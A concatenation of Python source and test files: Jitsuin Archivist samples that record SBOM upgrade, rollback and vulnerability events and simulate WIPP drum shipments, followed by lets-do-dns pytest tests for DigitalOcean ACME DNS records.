if sbom_upgrade["environment"] is not None:
self._environment = sbom_upgrade["environment"]
else:
sbom_upgrade["environment"] = self._environment
self._add_attachments(attachments)
props = {
"operation": "Record",
"behaviour": "RecordEvidence",
}
attrs = {
"arc_description": sbom_upgrade["description"],
"arc_evidence": "Upgrade",
"arc_display_type": "Upgrade",
"sbom_upgrade_component": sbom_upgrade["name"],
"sbom_upgrade_hash": sbom_upgrade["hash"],
"sbom_upgrade_version": sbom_upgrade["version"],
"sbom_upgrade_author": sbom_upgrade["author"],
"sbom_upgrade_supplier": sbom_upgrade["supplier"],
"sbom_upgrade_uuid": sbom_upgrade["uuid"],
"sbom_upgrade_environment": sbom_upgrade["environment"],
"arc_attachments": [
{
"arc_display_name": sbom_upgrade["description"],
"arc_attachment_identity": attachment["identity"],
"arc_hash_value": attachment["hash"]["value"],
"arc_hash_alg": attachment["hash"]["alg"],
}
for attachment in self._attachments
],
}
if custom_attrs is not None:
attrs.update(custom_attrs)
asset_attrs = {
"sbom_component": sbom_upgrade["name"],
"sbom_hash": sbom_upgrade["hash"],
"sbom_version": sbom_upgrade["version"],
"sbom_author": sbom_upgrade["author"],
"sbom_supplier": sbom_upgrade["supplier"],
"sbom_uuid": sbom_upgrade["uuid"],
}
if custom_asset_attrs is not None:
asset_attrs.update(custom_asset_attrs)
return self.arch.events.create(
self._asset["identity"],
props=props,
attrs=attrs,
asset_attrs=asset_attrs,
confirm=True,
)
def upgrade_plan(
self,
sbom_planned: dict,
*,
attachments: Optional[list] = None,
custom_attrs: Optional[dict] = None,
):
if sbom_planned["environment"] is not None:
self._environment = sbom_planned["environment"]
else:
sbom_planned["environment"] = self._environment
self._add_attachments(attachments)
props = {
"operation": "Record",
"behaviour": "RecordEvidence",
}
attrs = {
"arc_description": sbom_planned["description"],
"arc_evidence": "Upgrade Plan",
"arc_display_type": "Upgrade Plan",
"sbom_planned_date": sbom_planned["date"],
"sbom_planned_captain": sbom_planned["captain"],
"sbom_planned_component": sbom_planned["name"],
"sbom_planned_version": sbom_planned["version"],
"sbom_planned_reference": sbom_planned["reference"],
"sbom_planned_environment": sbom_planned["environment"],
"arc_attachments": [
{
"arc_display_name": sbom_planned["description"],
"arc_attachment_identity": attachment["identity"],
"arc_hash_value": attachment["hash"]["value"],
"arc_hash_alg": attachment["hash"]["alg"],
}
                for attachment in self._attachments
],
}
if custom_attrs is not None:
attrs.update(custom_attrs)
return self.arch.events.create(
self._asset["identity"], props=props, attrs=attrs, confirm=True
)
def upgrade_accepted(
self,
sbom_accepted: dict,
*,
attachments: Optional[list] = None,
custom_attrs: Optional[dict] = None,
):
if sbom_accepted["environment"] is not None:
self._environment = sbom_accepted["environment"]
else:
sbom_accepted["environment"] = self._environment
self._add_attachments(attachments)
props = {
"operation": "Record",
"behaviour": "RecordEvidence",
}
attrs = {
"arc_description": sbom_accepted["description"],
"arc_evidence": "Upgrade Accepted",
"arc_display_type": "Upgrade Accepted",
"sbom_accepted_date": sbom_accepted["date"],
"sbom_accepted_captain": sbom_accepted["captain"],
"sbom_accepted_component": sbom_accepted["name"],
"sbom_accepted_version": sbom_accepted["version"],
"sbom_accepted_reference": sbom_accepted["reference"],
"sbom_accepted_environment": sbom_accepted["environment"],
"arc_attachments": [
{
"arc_display_name": sbom_accepted["description"],
"arc_attachment_identity": attachment["identity"],
"arc_hash_value": attachment["hash"]["value"],
"arc_hash_alg": attachment["hash"]["alg"],
}
for attachment in self._attachments
],
}
if custom_attrs is not None:
attrs.update(custom_attrs)
return self.arch.events.create(
self._asset["identity"], props=props, attrs=attrs, confirm=True
)
# Rollback Events
def rollback(
self,
sbom_rollback: dict,
*,
attachments: Optional[list] = None,
custom_attrs: Optional[dict] = None,
custom_asset_attrs: Optional[dict] = None,
):
if sbom_rollback["environment"] is not None:
self._environment = sbom_rollback["environment"]
else:
sbom_rollback["environment"] = self._environment
self._add_attachments(attachments)
props = {
"operation": "Record",
"behaviour": "RecordEvidence",
}
attrs = {
"arc_description": sbom_rollback["description"],
"arc_evidence": "Rollback",
"arc_display_type": "Rollback",
"sbom_rollback_component": sbom_rollback["name"],
"sbom_rollback_hash": sbom_rollback["hash"],
"sbom_rollback_version": sbom_rollback["version"],
"sbom_rollback_author": sbom_rollback["author"],
"sbom_rollback_supplier": sbom_rollback["supplier"],
"sbom_rollback_uuid": sbom_rollback["uuid"],
"sbom_rollback_environment": sbom_rollback["environment"],
"arc_attachments": [
{
"arc_display_name": sbom_rollback["description"],
"arc_attachment_identity": attachment["identity"],
"arc_hash_value": attachment["hash"]["value"],
"arc_hash_alg": attachment["hash"]["alg"],
}
for attachment in self._attachments
],
}
if custom_attrs is not None:
attrs.update(custom_attrs)
asset_attrs = {
"sbom_component": sbom_rollback["name"],
"sbom_hash": sbom_rollback["hash"],
"sbom_version": sbom_rollback["version"],
"sbom_author": sbom_rollback["author"],
"sbom_supplier": sbom_rollback["supplier"],
"sbom_uuid": sbom_rollback["uuid"],
}
if custom_asset_attrs is not None:
asset_attrs.update(custom_asset_attrs)
return self.arch.events.create(
self._asset["identity"],
props=props,
attrs=attrs,
asset_attrs=asset_attrs,
confirm=True,
)
def rollback_plan(
self,
sbom_planned: dict,
*,
attachments: Optional[list] = None,
custom_attrs: Optional[dict] = None,
):
if sbom_planned["environment"] is not None:
self._environment = sbom_planned["environment"]
else:
sbom_planned["environment"] = self._environment
self._add_attachments(attachments)
props = {
"operation": "Record",
"behaviour": "RecordEvidence",
}
attrs = {
"arc_description": sbom_planned["description"],
"arc_evidence": "Rollback Plan",
"arc_display_type": "Rollback Plan",
"sbom_planned_date": sbom_planned["date"],
"sbom_planned_captain": sbom_planned["captain"],
"sbom_planned_component": sbom_planned["name"],
"sbom_planned_version": sbom_planned["version"],
"sbom_planned_reference": sbom_planned["reference"],
"sbom_planned_environment": sbom_planned["environment"],
"arc_attachments": [
{
"arc_display_name": sbom_planned["description"],
"arc_attachment_identity": attachment["identity"],
"arc_hash_value": attachment["hash"]["value"],
"arc_hash_alg": attachment["hash"]["alg"],
}
                for attachment in self._attachments
],
}
if custom_attrs is not None:
attrs.update(custom_attrs)
return self.arch.events.create(
self._asset["identity"], props=props, attrs=attrs, confirm=True
)
def rollback_accepted(
self,
sbom_accepted: dict,
*,
attachments: Optional[list] = None,
custom_attrs: Optional[dict] = None,
):
if sbom_accepted["environment"] is not None:
self._environment = sbom_accepted["environment"]
else:
sbom_accepted["environment"] = self._environment
self._add_attachments(attachments)
props = {
"operation": "Record",
"behaviour": "RecordEvidence",
}
attrs = {
"arc_description": sbom_accepted["description"],
"arc_evidence": "Rollback Accepted",
"arc_display_type": "Rollback Accepted",
"sbom_accepted_date": sbom_accepted["date"],
"sbom_accepted_captain": sbom_accepted["captain"],
"sbom_accepted_component": sbom_accepted["name"],
"sbom_accepted_version": sbom_accepted["version"],
"sbom_accepted_reference": sbom_accepted["reference"],
"sbom_accepted_environment": sbom_accepted["environment"],
"arc_attachments": [
{
"arc_display_name": sbom_accepted["description"],
"arc_attachment_identity": attachment["identity"],
"arc_hash_value": attachment["hash"]["value"],
"arc_hash_alg": attachment["hash"]["alg"],
}
for attachment in self._attachments
],
}
if custom_attrs is not None:
attrs.update(custom_attrs)
return self.arch.events.create(
self._asset["identity"], props=props, attrs=attrs, confirm=True
)
# Vulnerability Events
def vuln_disclosure(
self,
vuln: dict,
*,
attachments: Optional[list] = None,
custom_attrs: Optional[dict] = None,
):
self._add_attachments(attachments)
props = {
"operation": "Record",
"behaviour": "RecordEvidence",
}
attrs = {
"arc_description": vuln["description"],
"arc_evidence": "Vulnerability Disclosure",
"arc_display_type": "Vulnerability Disclosure",
"vuln_name": vuln["name"],
"vuln_reference": vuln["reference"],
"vuln_id": vuln["id"],
"vuln_category": vuln["category"],
"vuln_severity": vuln["severity"],
"vuln_status": vuln["status"],
"vuln_author": vuln["author"],
"vuln_target_component": vuln["target_component"],
"vuln_target_version": vuln["target_version"],
"arc_attachments": [
{
"arc_display_name": vuln["description"],
"arc_attachment_identity": attachment["identity"],
"arc_hash_value": attachment["hash"]["value"],
"arc_hash_alg": attachment["hash"]["alg"],
}
for attachment in self._attachments
],
}
if custom_attrs is not None:
attrs.update(custom_attrs)
return self.arch.events.create(
self._asset["identity"], props=props, attrs=attrs, confirm=True
)
def vuln_update(
self,
vuln: dict,
attachments: Optional[list] = None,
custom_attrs: Optional[dict] = None,
):
self._add_attachments(attachments)
props = {
"operation": "Record",
"behaviour": "RecordEvidence",
}
attrs = {
"arc_description": vuln["description"],
"arc_evidence": "Vulnerability Update",
"arc_display_type": "Vulnerability Update",
"vuln_name": vuln["name"],
"vuln_reference": vuln["reference"],
"vuln_id": vuln["id"],
"vuln_category": vuln["category"],
"vuln_severity": vuln["severity"],
"vuln_status": vuln["status"],
"vuln_author": vuln["author"],
"vuln_target_component": vuln["target_component"],
"vuln_target_version": vuln["target_version"],
"arc_attachments": [
{
"arc_display_name": vuln["description"],
"arc_attachment_identity": attachment["identity"],
"arc_hash_value": attachment["hash"]["value"],
"arc_hash_alg": attachment["hash"]["alg"],
}
for attachment in self._attachments
],
}
if custom_attrs is not None:
attrs.update(custom_attrs)
return self.arch.events.create(
self._asset["identity"], props=props, attrs=attrs, confirm=True
)
    def _add_attachments(self, attachments: list):
        self._attachments = []
        if not attachments:
            return
        for attachment in attachments:
            with open(f"{attachment}", "rb") as fd:
                self._attachments.append(self.arch.attachments.upload(fd))
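# Usage sketch (illustrative only; the asset name, environment and file names below
# are assumptions, not part of this sample):
#   deployment = SoftwareDeployment(arch)            # arch: an authenticated Archivist client
#   asset = deployment.create("ACME Detector", "Edge inference service",
#                             sbom_environment="PRODUCTION",
#                             attachments=["sbom.xml"])
#   deployment.installation({...}, attachments=["install_log.txt"])   # records an Installation event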
```
#### File: archivist_samples/synsation/analyze.py
```python
from datetime import datetime, timezone
import logging
from sys import exit as sys_exit
from sys import stdout as sys_stdout
from archivist import about
from archivist.parser import common_parser
from archivist.timestamp import parse_timestamp
from ..testing.asset import (
MAINTENANCE_PERFORMED,
MAINTENANCE_REQUEST,
VULNERABILITY_ADDRESSED,
VULNERABILITY_REPORT,
)
from ..testing.parser import common_endpoint
LOGGER = logging.getLogger(__name__)
def analyze_matched_pairs(label, p1, p2, events):
if p1 in events and p2 in events:
matched = set(events[p1]).intersection(events[p2])
unmatched = set(events[p1]).difference(events[p2])
LOGGER.info(f"There are {len(matched)} completed {label} events")
for cv in matched:
# Check how long it was outstanding
time_req = parse_timestamp(events[p1][cv]["timestamp_declared"])
time_resp = parse_timestamp(events[p2][cv]["timestamp_declared"])
response_time = time_resp - time_req
LOGGER.info(f" --> Response time: {response_time}")
LOGGER.info(
f"There are {len(unmatched)} uncompleted {label} events outstanding"
)
# Check how long it has been outstanding
now = datetime.now(timezone.utc)
for cv in unmatched:
time_req = parse_timestamp(events[p1][cv]["timestamp_declared"])
outstanding_time = now - time_req
LOGGER.info(f" --> Outstanding for {outstanding_time}")
else:
LOGGER.info(f"There are NO {label} events to analyse")
def analyze_asset(conn, asset):
# Fetch basic asset info. If any of these fields is missing it's fatal...
try:
aid = asset["identity"]
attrs = asset["attributes"]
aname = attrs["arc_display_name"]
atype = attrs["arc_display_type"]
aversion = attrs["arc_firmware_version"]
aserial = attrs["arc_serial_number"]
adesc = attrs["arc_description"]
except KeyError:
# Some devices won't have this property. Just ignore failures.
LOGGER.error("Malformed Asset.")
return
LOGGER.info("<---------------------------------------->")
LOGGER.info(f"Analyzing {atype} '{aname}' (serial # {aserial})")
LOGGER.info(f'"{adesc}"')
LOGGER.info(f"Current Firmware Version: {aversion}")
# Get all the events for this device
number_of_events = conn.events.count(asset_id=aid)
if number_of_events == 0:
LOGGER.debug("No events found for asset")
LOGGER.info("No events to analyse.")
return
allevents = conn.events.list(asset_id=aid)
# Sort the events into paired buckets that we care about, keyed on
# the events' "correlation_value". Only works for unique pairs of
# correlation values, which is the suggested convention but not
# enforced by Archivist services
sortedevents = {}
for event in allevents:
try:
etype = event["event_attributes"]["arc_display_type"]
corval = event["event_attributes"]["arc_correlation_value"]
except KeyError:
LOGGER.debug("Couldn't get essential info for this event.")
continue
if etype not in sortedevents:
sortedevents[etype] = {}
sortedevents[etype][corval] = event
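    # Resulting structure (illustrative): sortedevents[<arc_display_type>][<arc_correlation_value>] = event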
# Now we've got them all we can do the analysis
# + Which events weren't fixed at all?
# + For events that were fixed, how long did it take?
# maintenance events
analyze_matched_pairs(
"maintenance", MAINTENANCE_REQUEST, MAINTENANCE_PERFORMED, sortedevents
)
# vulnerability events
analyze_matched_pairs(
"firmware", VULNERABILITY_REPORT, VULNERABILITY_ADDRESSED, sortedevents
)
# Summarize TBD
LOGGER.info("---")
def run(archivist):
"""logic goes here"""
LOGGER.info("Using version %s of jitsuin-archivist", about.__version__)
for asset in archivist.assets.list():
analyze_asset(archivist, asset)
LOGGER.info("Done.")
sys_exit(0)
def entry():
parser, _ = common_parser("Checks maintenance and update performance for assets")
parser.add_argument(
"--namespace",
type=str,
dest="namespace",
action="store",
default=None,
help="namespace of item population (to enable parallel demos",
)
# per example options here ....
args = parser.parse_args()
poc = common_endpoint("synsation", args)
run(poc)
parser.print_help(sys_stdout)
sys_exit(1)
```
#### File: archivist_samples/synsation/device_worker.py
```python
import random
import time
def threadmain(charger, timewarp):
while True:
# Wait for a customer to show up
time.sleep(random.randint(1, 10))
# Charge up
charger.charge_job(random.randint(25, 99), timewarp)
# Check if it needs servicing, and kick off a maintenance worker
# thread to attend to it if so
charger.service(timewarp)
```
#### File: archivist_samples/synsation/jitsuinator.py
```python
import datetime
import logging
from sys import exit as sys_exit
from sys import stdout as sys_stdout
import time
import uuid
from archivist import about
from archivist.errors import ArchivistNotFoundError
from archivist.parser import common_parser
from ..testing.asset import MyAsset
from ..testing.parser import common_endpoint
from ..testing.time_warp import TimeWarp
from .util import attachment_upload_from_file
LOGGER = logging.getLogger(__name__)
def demo_flow(ac, asset_id, asset_type, tw, wait):
# Demo flow:
# -> Asset is created, nothing to see here
# -> White hat hacker reports vulnerability
# -> OEM fixes it and issues the patch
# -> Integrator approves the patch and issues new safety certificate
# -> Owner accepts new version and issues maintenance request to have
# it installed by the operator
# -> Operator schedules downtime and patches it
# -> All is well
job_corval = str(uuid.uuid4())
cve_corval = str(uuid.uuid4())
# -> Asset is created, nothing to see here
# -> White hat hacker reports vulnerability
if wait:
time.sleep(wait)
LOGGER.info("White Hat Hacker...")
else:
input("Press to enact White Hat Hacker")
cve_id = "CVE2020-deadbeef"
MyAsset(ac, asset_id, tw, "<EMAIL>",).report_vulnerability(
(
f"Synsation Industries {asset_type}s are vulnerable "
f"to {cve_id}. Upgrade as soon as possible."
),
cve_id,
cve_corval,
)
# -> OEM fixes it and issues the patch
if wait:
time.sleep(wait)
LOGGER.info("OEM patch...")
else:
input("Press to enact OEM issue patch")
MyAsset(ac, asset_id, tw, "<EMAIL>",).patch_vulnerability(
f"Patch for critical vulnerability '{cve_id}' released in version 1.6",
(
"SHA256-sum for official 1.6 release: "
"68ada47318341d060c387a765dd854b57334ab1f7322d22c155428414feb7518"
),
)
# -> Integrator approves the patch and issues new safety certificate
if wait:
time.sleep(wait)
LOGGER.info("Integrator approval...")
else:
input("Press to enact Integrator approves")
iattachment = attachment_upload_from_file(
ac, "trafficlightconformance.png", "image/png"
)
rattachment = attachment_upload_from_file(
ac, "trafficlightconformance.pdf", "application/pdf"
)
MyAsset(ac, asset_id, tw, "<EMAIL>",).certify_patch(
"Safety conformance approved for version 1.6. See attached conformance report",
"DVA Conformance Report attached",
{
"arc_primary_image_identity": iattachment["identity"],
"arc_attachments": [
{
"arc_display_name": "arc_primary_image",
"arc_attachment_identity": iattachment["identity"],
"arc_hash_value": iattachment["hash"]["value"],
"arc_hash_alg": iattachment["hash"]["alg"],
},
{
"arc_display_name": "Conformance Report",
"arc_attachment_identity": rattachment["identity"],
"arc_hash_value": rattachment["hash"]["value"],
"arc_hash_alg": rattachment["hash"]["alg"],
},
],
},
extra_attrs={"synsation_conformance_report": rattachment["identity"]},
)
# -> Owner accepts new version and issues maintenance request to have it installed
if wait:
time.sleep(wait)
LOGGER.info("Owner approval...")
else:
input("Press to enact Owner approves")
MyAsset(ac, asset_id, tw, "<EMAIL>",).service_required(
"Version 1.6 accepted. Please install ASAP",
job_corval,
)
# -> Operator schedules downtime and patches it
if wait:
time.sleep(wait)
LOGGER.info("Maintenance and patch...")
else:
input("Press to enact Maintenance")
MyAsset(ac, asset_id, tw, "<EMAIL>",).service(
f"Upgraded and restarted {asset_type} during safe downtime window",
job_corval,
)
MyAsset(ac, asset_id, tw, "<EMAIL>",).update_firmware(
"Responding to vulnerability 'CVE2020-deadbeef' with patch 'v1.6'",
"1.6",
cve_corval,
)
# -> All is well
LOGGER.info("Done")
# Main app
##########
def run(ac, args):
"""logic goes here"""
LOGGER.info("Using version %s of jitsuin-archivist", about.__version__)
LOGGER.info("Looking for asset...")
try:
asset = ac.assets.read_by_signature(
attrs={"arc_display_name": args.asset_name},
)
except ArchivistNotFoundError:
LOGGER.info("Asset not found. Aborting.")
sys_exit(1)
asset_id = asset["identity"]
attrs = asset["attributes"]
asset_type = attrs["arc_display_type"] if "arc_display_type" in attrs else "Device"
LOGGER.info("Creating time warp...")
tw = TimeWarp(args.start_date, args.fast_forward)
LOGGER.info("Beginning simulation...")
demo_flow(ac, asset_id, asset_type, tw, args.wait)
LOGGER.info("Done.")
sys_exit(0)
def entry():
parser, _ = common_parser("Runs the Jitsuinator demo script manually")
parser.add_argument(
"--namespace",
type=str,
dest="namespace",
action="store",
default=None,
help="namespace of item population (to enable parallel demos",
)
parser.add_argument(
"-n",
"--asset_name",
type=str,
dest="asset_name",
action="store",
default="tcl.ccj.01",
help="Name of the asset to ship",
)
parser.add_argument(
"-s",
"--start-date",
type=lambda d: datetime.datetime.strptime(d, "%Y%m%d"),
dest="start_date",
action="store",
default=datetime.date.today() - datetime.timedelta(days=1),
help="Start date for event series (format: yyyymmdd)",
)
parser.add_argument(
"-f",
"--fast-forward",
type=float,
dest="fast_forward",
action="store",
default=3600,
help="Fast forward time in event series (default: 1 second = 1 hour)",
)
parser.add_argument(
"-w",
"--wait",
type=float,
dest="wait",
action="store",
default=0.0,
help="auto-advance after WAIT seconds",
)
args = parser.parse_args()
poc = common_endpoint("synsation", args)
run(poc, args)
parser.print_help(sys_stdout)
sys_exit(1)
```
#### File: archivist_samples/wipp/run.py
```python
try:
import importlib.resources as pkg_resources
except ImportError:
# Try backported to PY<37 'importlib_resources'.
import importlib_resources as pkg_resources
import logging
import random
import string
from sys import exit as sys_exit
from archivist import about
from . import wipp_files
from .wipp import Wipp
LOGGER = logging.getLogger(__name__)
def upload_attachment(arch, path, name):
with pkg_resources.open_binary(wipp_files, path) as fd:
blob = arch.attachments.upload(fd)
attachment = {
"arc_display_name": name,
"arc_attachment_identity": blob["identity"],
"arc_hash_value": blob["hash"]["value"],
"arc_hash_alg": blob["hash"]["alg"],
}
return attachment
def run(arch, args):
LOGGER.info("Using version %s of jitsuin-archivist", about.__version__)
LOGGER.info("Fetching use case test assets namespace %s", args.namespace)
# Wipp class encapsulates wipp object in RKVST
LOGGER.info("Creating Drum Asset...")
drum = Wipp(arch, "55 gallon drum")
serial_num = "".join(
random.choice(string.ascii_lowercase + string.digits) for _ in range(12)
)
drumname = "Drum-" + serial_num
drum.create(
drumname,
"Standard non-POC 55 gallon drum",
serial_num,
attachments=[upload_attachment(arch, "55gallon.jpg", "arc_primary_image")],
custom_attrs={
"wipp_capacity": "55",
"wipp_package_id": serial_num,
},
)
LOGGER.info("Drum Asset Created (Identity=%s)", drum.asset["identity"])
# Cask Asset
LOGGER.info("Creating Cask Asset...")
serial_num = "".join(
random.choice(string.ascii_lowercase + string.digits) for _ in range(12)
)
caskname = "Cask-" + serial_num
cask = Wipp(arch, "TRU RH 72B Cask")
cask.create(
caskname,
"NRC certified type-B road shipping container, capacity 3 x 55-gallon drum",
serial_num,
attachments=[upload_attachment(arch, "rh72b.png", "arc_primary_image")],
custom_attrs={
"wipp_capacity": "3",
},
)
LOGGER.info("Cask Asset Created (Identity=%s)", cask.asset["identity"])
# Drum Characterization
LOGGER.info("Adding characterization...")
drum.characterize(
{
"description": "Waste coding characterization: A2 Fraction 2.10E+05",
"weight": "790300",
"a2fraction_characterized": "2.10E+05",
"activity_characterized": "1.69E+02",
"total_characterized": "2.12E+02",
},
attachments=[
upload_attachment(
arch, "DOE-WIPP-02-3122_Rev_9_FINAL.pdf", "Reference WAC"
),
upload_attachment(arch, "characterization.pdf", "Characterization report"),
],
)
LOGGER.info("Characterization registered...")
# Drum Tomography
LOGGER.info("Adding tomography...")
drum.tomography(
{
"description": "Confirming waste coding characterizations",
"weight": "790300",
"a2fraction_confirmed": "2.10E+05",
"activity_confirmed": "1.69E+02",
"total_confirmed": "2.12E+02",
},
attachments=[
upload_attachment(arch, "wipp_radiography.jpg", "arc_primary_image"),
upload_attachment(
arch, "DOE-WIPP-02-3122_Rev_9_FINAL.pdf", "Reference WAC"
),
],
)
LOGGER.info("Tomography registered...")
# Loading
LOGGER.info("Loading drum and cask...")
drum.loading(
{
"description": "Loaded drum into "
+ cask.asset["attributes"]["arc_display_name"],
"container": cask.asset["identity"],
},
attachments=[
upload_attachment(arch, "trupact_loading.jpg", "arc_primary_image")
],
)
cask.loading(
{
"description": "Filled with "
+ drum.asset["attributes"]["arc_display_name"],
"container": cask.asset["identity"],
},
custom_asset_attrs={
"wipp_inventory": drum.asset["identity"],
},
attachments=[
upload_attachment(arch, "trupact_loading.jpg", "arc_primary_image")
],
)
LOGGER.info("Loading registered...")
# Pre-shipping
LOGGER.info("Pre-shipping inspection...")
drum.preshipping(
{
"description": "Inspection inventory "
+ cask.asset["attributes"]["arc_display_name"],
},
attachments=[
upload_attachment(arch, "preshipment_inspection.jpg", "arc_primary_image")
],
)
cask.preshipping(
{
"description": "Inspected " + cask.asset["attributes"]["arc_display_name"],
},
attachments=[
upload_attachment(arch, "preshipment_inspection.jpg", "arc_primary_image")
],
)
LOGGER.info("Pre-shipping inspection registered...")
# Departure
LOGGER.info("Loading departure...")
drum.departure(
{
"description": "Departed SRS inventory "
+ cask.asset["attributes"]["arc_display_name"],
},
attachments=[
upload_attachment(arch, "truck_departure.jpg", "arc_primary_image"),
upload_attachment(
arch, "SRS_to_WPP_route_instructions.pdf", "approved_route"
),
],
)
cask.departure(
{
"description": cask.asset["attributes"]["arc_display_name"]
+ "departing for WIPP."
},
attachments=[
upload_attachment(arch, "truck_departure.jpg", "arc_primary_image"),
upload_attachment(
arch, "SRS_to_WPP_route_instructions.pdf", "approved_route"
),
],
)
LOGGER.info("Departure registered...")
# Waypoint
waypoints = [
["Atlanta", "33.592177", "-84.406064"],
["Talladega", "33.592177", "-86.248379"],
["Birmingham", "33.494993", "-86.895403"],
["Tuscaloosa", "33.184220", "-87.610330"],
["Meridian", "32.391672", "-88.532850"],
["Jackson", "32.285409", "-90.074633"],
["Monroe", "32.463868", "-91.893769"],
["Shreveport", "32.537993", "-93.651582"],
["Tyler", "32.334001", "-95.321504"],
["South Dallas", "32.639816", "-96.826631"],
["Gordon", "32.499115", "-98.521317"],
["Abilene", "32.457004", "-99.816598"],
["<NAME>", "32.244259", "-101.458984"],
["Andrews", "32.312469", "-102.548197"],
["Seminole", "32.457004", "-99.816598"],
["Hobbs", "32.244259", "-101.458984"],
]
for point in waypoints:
LOGGER.info("Loading waypoints from %s...", point[0])
cask.waypoint(
{
"description": "TRAGIS smart sensors ping: Checking in near "
+ point[0]
+ " All sensors GREEN",
"latitude": point[1],
"longitude": point[2],
},
custom_attrs={
"wipp_sensors_shock": "0",
"wipp_sensors_rad": "45",
},
attachments=[
upload_attachment(arch, "truck_departure.jpg", "arc_primary_image")
],
)
LOGGER.info("Waypoints registered...")
# Arrival
LOGGER.info("Loading arrival...")
drum.arrival(
{
"description": "At WIPP, inventory"
+ cask.asset["attributes"]["arc_display_name"],
},
attachments=[upload_attachment(arch, "truck_arrival.jpg", "arc_primary_image")],
)
cask.arrival(
{
"description": cask.asset["attributes"]["arc_display_name"]
+ "arriving at WIPP",
},
attachments=[upload_attachment(arch, "truck_arrival.jpg", "arc_primary_image")],
)
LOGGER.info("Arrival registered...")
# Unload
LOGGER.info("Unloading...")
drum.unloading(
{
"description": "Unloaded drum from cask"
+ cask.asset["attributes"]["arc_display_name"],
},
custom_asset_attrs={
"wipp_container": "",
},
attachments=[
upload_attachment(arch, "trupact_unloading.jpg", "arc_primary_image")
],
)
cask.unloading(
{
"description": "Unloaded " + drum.asset["attributes"]["arc_display_name"],
},
custom_asset_attrs={
"wipp_inventory": "",
},
attachments=[
upload_attachment(arch, "trupact_unloading.jpg", "arc_primary_image")
],
)
LOGGER.info("Unloading registered...")
# Emplacement
LOGGER.info("Loading emplacement...")
drum.emplacement(
{
"description": "Emplacement in location D-32",
"location": "D-32",
},
attachments=[
upload_attachment(arch, "waste_placement.jpg", "arc_primary_image")
],
)
LOGGER.info("Emplacement registered...")
sys_exit(0)
``` |
{
"source": "Jitsusama/lets-do-dns",
"score": 3
} |
#### File: lets_do_dns/acme_dns_auth/time_delay.py
```python
import time
def sleep(delay):
"""Pause program execution until delay (in seconds) has expired."""
time.sleep(delay)
```
#### File: tests/system/test_lets-do-dns_script.py
```python
import os
import subprocess
import pytest
from requests import get, delete
# ATTENTION: Look at conftest.py for py.test fixture definitions.
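# Environment contract exercised by these tests (descriptions are a summary of how
# the tests below use each variable; values are illustrative):
#   DO_APIKEY / DO_DOMAIN                 - DigitalOcean API key and managed domain
#   CERTBOT_DOMAIN / CERTBOT_VALIDATION   - injected by certbot for the dns-01 challenge
#   CERTBOT_AUTH_OUTPUT                   - record id printed by the pre-hook, consumed by the post-hook
#   LETS_DO_POSTCMD                       - optional command run by the post-hook after record cleanup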
def test_pre_authentication_hook(
do_base_uri, do_auth_header, do_api_key, do_domain, do_hostname):
os.environ.update({
'DO_APIKEY': do_api_key,
'DO_DOMAIN': do_domain,
'CERTBOT_DOMAIN':
'{}.{}'.format(do_hostname, do_domain),
'CERTBOT_VALIDATION':
'test_pre_authentication_hook',
})
program_output = subprocess.check_output('lets-do-dns')
record_id = program_output.decode()
request_uri = '{}/{}/records/{}'.format(
do_base_uri, do_domain, record_id)
try:
response = get(request_uri, headers=do_auth_header)
record_data = response.json()['domain_record']
expected_hostname = '_acme-challenge.{}'.format(do_hostname)
assert (record_data['type'] == 'TXT'
and record_data['name'] == expected_hostname
and record_data['data'] == 'test_pre_authentication_hook')
finally: # we always want to delete the created record.
delete(request_uri, headers=do_auth_header)
def test_post_authentication_hook_without_post_command(
do_base_uri, do_auth_header, do_api_key, do_domain, do_hostname,
do_record_id):
os.environ.update({
'DO_APIKEY': do_api_key,
'DO_DOMAIN': do_domain,
'CERTBOT_DOMAIN':
'{}.{}'.format(do_hostname, do_domain),
'CERTBOT_VALIDATION':
'test_post_authentication_hook_without_post_command',
'CERTBOT_AUTH_OUTPUT':
str(do_record_id)
})
subprocess.check_call('lets-do-dns')
request_uri = '{}/{}/records/{}'.format(
do_base_uri, do_domain, do_record_id)
get_response = get(request_uri, headers=do_auth_header)
assert get_response.status_code == 404
def test_post_authentication_hook_with_post_command(
do_base_uri, do_auth_header, do_api_key, do_domain, do_hostname,
do_record_id):
os.environ.update({
'DO_APIKEY': do_api_key,
'DO_DOMAIN': do_domain,
'LETS_DO_POSTCMD': 'ls file-does-not-exist',
'CERTBOT_DOMAIN':
'{}.{}'.format(do_hostname, do_domain),
'CERTBOT_VALIDATION':
'test_post_authentication_hook_with_post_command',
'CERTBOT_AUTH_OUTPUT':
str(do_record_id),
})
postcmd_process = subprocess.Popen(
['lets-do-dns'], stderr=subprocess.PIPE)
_, postcmd_output = postcmd_process.communicate()
request_uri = '{}/{}/records/{}'.format(
do_base_uri, do_domain, do_record_id)
get_response = get(request_uri, headers=do_auth_header)
assert (get_response.status_code == 404
and 'file-does-not-exist' in postcmd_output.decode())
def test_help_command():
help_output = subprocess.check_output(['lets-do-dns', '--help'])
assert 'lets-do-dns' in help_output.decode()
def test_missing_required_environment_variables_exits_properly():
with pytest.raises(subprocess.CalledProcessError) as exception:
subprocess.check_call('lets-do-dns')
assert exception.value.returncode == 2
```
#### File: do_domain/resource/test_delete.py
```python
from mock import ANY
import pytest
import requests.exceptions
from lets_do_dns.errors import RecordDeletionError
from lets_do_dns.do_domain.resource import Resource
def test_calls_delete(mocker):
mock_delete = mocker.patch(
'lets_do_dns.do_domain.resource.requests.delete')
resource = Resource('stub-api-key', 'stub-host', 'stub-domain')
resource.delete()
mock_delete.assert_called_once()
@pytest.mark.parametrize('record_id', [82227342, 2342552])
def test_calls_delete_with_correct_uri(mocker, record_id):
mock_delete = mocker.patch(
'lets_do_dns.do_domain.resource.requests.delete')
resource = Resource(
'stub-api-key', 'stub-host', 'stub-domain', record_id=record_id)
resource.delete()
expected_uri = (
'https://api.digitalocean.com/v2/domains/stub-domain/records/%s'
% record_id)
mock_delete.assert_called_once_with(
expected_uri, headers=ANY, timeout=ANY)
def test_calls_delete_with_correct_authorization_header(mocker):
mock_delete = mocker.patch(
'lets_do_dns.do_domain.resource.requests.delete')
resource = Resource('stub-api-key', 'stub-host', 'stub-domain')
resource.delete()
expected_auth_header = {'Authorization': 'Bearer stub-api-key'}
mock_delete.assert_called_once_with(
ANY, headers=expected_auth_header, timeout=ANY)
def test_calls_delete_with_correct_timeouts(mocker):
mock_post = mocker.patch(
'lets_do_dns.do_domain.resource.requests.delete')
resource = Resource('stub-api-key', 'stub-host', 'stub-domain')
resource.delete()
mock_post.assert_called_once_with(
ANY, headers=ANY, timeout=(10, 10))
def test_calls_response_with_delete_response(mocker):
mocker.patch(
